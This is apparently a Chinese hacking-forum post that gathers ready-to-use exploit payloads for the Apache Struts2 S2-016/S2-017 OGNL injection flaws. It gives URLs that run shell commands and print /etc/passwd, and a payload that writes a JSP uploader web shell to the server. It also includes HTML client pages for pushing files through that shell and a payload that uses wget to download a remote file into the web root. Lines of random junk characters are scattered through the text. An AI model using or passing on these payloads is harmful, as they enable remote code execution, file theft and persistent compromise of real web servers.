Struts2 S2-016/S2-017漏洞执行代码

admin

大家都发了，，我就整理了一下。友情提示，自己小命比shell重要哦。。
2 m6 ~/ W2 E8 v  L
喜欢就点一下感谢吧^_^

带回显命令执行：

: |. m) r! R: @- |5 @http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
" n, h7 m. M" d; P
  @. W0 ]$ V0 s( w8 }8 w2 N
' E2 o0 u4 H2 }5 a4 E& x+ L

0 h+ Z# e( n! o

! q" s$ p; }9 O+ Z7 F4 T
爆路径：

http://www.example.com/struts2-b ... 8%29.close%28%29%7D

# A4 V- r' M! |9 w% r+ ^

% I! z8 d! b! K' E# l8 j
* \5 m: l) S" a$ p, n6 Q
写文件：

http://www.example.com/struts2-blank/example/X.action?redirect:${
" ^; u# c' K( Q; N0 m; _
6 |9 @7 ?2 N% ?* {; g. f& d3 r%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
" e) v3 n9 P% _
8 K+ B1 @: S+ f3 k2 V7 X%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
4 X; @: A; ]2 S' U  `
, ^+ x- ]4 U- Z% y/ ^new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()

}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
0 c1 [; k$ O) S

4 n- @! i4 O4 A
写入的文件内容：

. G' f7 A9 K+ n% [5 W0 @8 f<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
) G, \6 ^! d; X6 j1 }& Y
其实就是一个jsp的小马，需要客户端配合                                                                                 
4 Q2 v4 T# }2 J" M2 c! u
, F! @) |, g5 E" f7 ~) y7 [: M' ^函数f是文件名，t是内容
4 ~2 [( `* ^, v5 Y# G8 y
9 j! z3 Y; h7 u9 O7 W2 t客户端：
& S: m+ K7 ~+ `" f; ~
/ U  @" P7 Z  D, H) N$ p  B<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">

/ C0 j6 E/ X  W<textarea name=t cols=120 rows=10 width=45>your code</textarea>

  v" Z% Z  h3 w( v1 ^1 |<center>
) {, A8 N1 B2 L0 l
" h6 n0 o# Q. l. k

/ I1 O2 y% v& Z8 R3 V7 W<input type=submit value="提交">
5 o9 J. f% b6 p
</form>
, s, T: P- G! ?$ S* ]% ^
0 F' B) o, i/ I( T9 @就在当前目录建立一个fjp.jsp

shell：http://www.example.com/struts2-blank/example/fjp.jsp

' B7 p: \  B5 Z5 N9 V5 e
7 ?2 b* c1 t8 z3 Z1 ?
" M, T8 `( a% z0 o: R# }1 C& V还有@园长的一个客户端：

' P6 G' i' N5 ^) h; t( [<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8">

* l+ ?3 b6 J: N3 F+ G<title>jsp-园长</title>
: E( M6 l' K1 F, `! U
</head>

) G1 q8 P2 \  b  Q6 p9 u8 P/ W! P3 P<style>

.main{width:980px;height:600px;margin:0 auto;}

! `8 r. V; P* o6 p2 p.url{width:300px;}
. L  m# B* g# F' W# w5 ^
.fn{width:60px;}
5 a% v/ d! {# B
) L' [4 f: q) X. Q% E/ Y.content{width:80%;height:60%;}

; D7 @) k, r# U$ K) {3 r</style>
: W, e. u9 t, N5 G
% ?0 c. N8 o9 ]7 V3 S<script>
3 e' V! w3 z5 A2 l8 x; |
  function upload(){

$ I2 @: b# j4 P3 d, u, L+ v    var url = document.getElementById('url').value,

8 b0 o  n8 G4 [      content = document.getElementById('content').value,
8 p% H4 Y/ R; b  f) I  ]$ a
      fileName = document.getElementById('fn').value,
3 z2 V6 P* W* ?" e
& r5 I! R/ L; C) {3 f6 M/ v$ L- u      form = document.getElementById('fm');

    if(url.length == 0){
/ [) ]6 E9 e5 ]" i! q) T
( s$ c$ j+ @0 }2 D      alert("Url not allowd empty!");
& O6 l+ i1 \, y5 D1 V: W5 g( ~9 z
      return ;
. s! H) L8 f' c) Q7 X7 g: W1 ~) n
    }
1 M& [1 A: R7 W$ m8 ?
( t/ f. T& w- E" \    if(content.length == 0){
; I& e% V* n: P3 T, X& d
      alert("Content not allowd empty!");
& V3 t+ H1 ]5 h! ^  u$ R
* V$ l+ N0 |0 q  H: m      return ;

' Y1 c+ \7 P9 u& B# x    }

2 T* I) t& D8 u    if(fileName.length == 0){
1 d- [1 r& ?! Q
, P# ]# R% A0 H* q# s$ K      alert("FileName not allowd empty!");
1 v# [! v9 h3 L% Z) v
      return ;

    }
- W0 `9 j7 t: S+ {; N
    form.action = url;

    form.submit();
- z, x& d% h' [; v; X
5 A8 |$ P6 @& J! S: l  }

3 q% C! x  @0 D! U4 }# U% A</script>
3 K" q- D8 I4 N- R+ W; J- w
4 Z; @6 h: t8 b! @7 t0 j<body>

# i/ D, D. g+ z7 U<div class="main">

6 l* j0 Q( W- Z8 b# b/ i+ M  <form id="fm" method="post">  

    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  

    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  

& e% Q  j5 B/ J; U5 j4 [    <a href="javascript:upload();">Upload</a>
  ]4 m# E3 @) u" Y' T9 }, M+ `
# h2 r2 X' b+ U: k( H
6 X, P, L( A, b3 i  f
) R+ y0 |+ X- O' N% z2 T7 @    <textarea id="content" class="content" name="t" ></textarea>

  </form>
2 c. g5 M  T6 r9 q9 Q
</div>

</body>
- v; x1 s4 x& ~. P% c6 x! h2 j3 b
" m; S3 v- p6 B7 n! V/ `</html>

/ |: c/ b6 |* X6 {2 J# _1 K

还有@X发的一个wget的getshell

" B9 X; c* n, N?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}

)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
; \( f$ A9 M0 ^复制代码